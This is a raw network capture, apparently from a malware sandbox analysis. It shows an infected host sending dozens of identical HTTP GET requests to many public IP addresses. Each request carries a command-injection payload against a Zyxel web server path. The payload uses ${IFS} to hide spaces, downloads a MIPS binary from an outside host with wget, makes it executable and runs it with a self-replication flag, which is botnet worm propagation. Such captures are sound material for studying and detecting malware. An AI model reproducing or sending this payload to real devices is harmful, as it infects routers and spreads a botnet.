                                    Jan 13, 2024 19:02:36.227283001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4928192.168.2.133786892.80.31.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227350950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4929192.168.2.1343746133.6.31.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227412939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4930192.168.2.1357314142.179.188.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227492094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4931192.168.2.1351992132.208.189.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227544069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4932192.168.2.135240492.235.15.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227626085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4933192.168.2.1358136155.5.146.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227704048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4934192.168.2.1347398182.245.150.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227766991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4935192.168.2.133517860.211.100.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227843046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4936192.168.2.1345372179.24.181.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227917910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4937192.168.2.1345214153.107.85.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227997065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4938192.168.2.1346636122.114.84.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228079081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4939192.168.2.1343242192.48.33.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228132963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4940192.168.2.1336076221.229.118.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228193045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4941192.168.2.1345770115.138.188.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228266001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4942192.168.2.1335348158.181.72.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228333950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4943192.168.2.135112014.157.123.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228404045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4944192.168.2.133713424.160.70.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228471994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4945192.168.2.1343386136.152.220.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228547096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4946192.168.2.1338902112.158.189.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228621960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4947192.168.2.1352494204.228.38.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228748083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4948192.168.2.1350138218.141.83.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228813887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4949192.168.2.133386632.198.224.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.228919983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4950192.168.2.1356440200.122.231.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229018927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4951192.168.2.1333110122.47.189.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229111910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4952192.168.2.135670413.249.254.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229177952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4953192.168.2.1344058185.66.210.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229232073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4954192.168.2.1338584163.116.64.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229290009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4955192.168.2.1360522140.173.251.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229366064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4956192.168.2.134090441.138.129.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229434967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4957192.168.2.134397237.161.86.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229487896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4958192.168.2.133614423.147.44.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229547977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4959192.168.2.135657042.122.101.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229634047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4960192.168.2.1340822184.149.201.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229692936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4961192.168.2.1343110159.100.109.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229775906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4962192.168.2.13555805.89.166.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229831934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4963192.168.2.1351052168.8.205.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229856014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4964192.168.2.133823649.108.108.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229945898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4965192.168.2.1351980170.215.188.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.229984045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4966192.168.2.134818478.29.212.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230066061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4967192.168.2.1358846169.156.206.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230129957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4968192.168.2.1339846159.234.95.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230197906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4969192.168.2.134612266.198.254.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230226040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4970192.168.2.1345604102.219.139.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230277061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4971192.168.2.1335590104.40.197.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230329990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4972192.168.2.135239062.76.88.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230372906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4973192.168.2.1348996185.54.241.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230468035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4974192.168.2.134853643.201.41.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230518103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4975192.168.2.1338296141.216.76.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230607033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4976192.168.2.135229864.165.92.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230638027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4977192.168.2.134070437.210.173.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230686903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4978192.168.2.134622840.7.221.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230748892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4979192.168.2.1337466196.1.255.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230788946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4980192.168.2.133539632.78.254.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230838060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4981192.168.2.134676683.79.76.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.230931044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4982192.168.2.134231881.82.205.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231031895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4983192.168.2.1335744186.129.73.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231137991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4984192.168.2.1359584109.157.17.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231213093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4985192.168.2.1337556194.230.169.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231285095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4986192.168.2.1354188178.98.71.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231357098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4987192.168.2.1347566145.62.53.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231432915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4988192.168.2.1350462196.16.203.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231512070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4989192.168.2.1333688121.144.69.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231616974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4990192.168.2.133776685.93.40.41443
                                    TimestampBytes transferredDirectionData
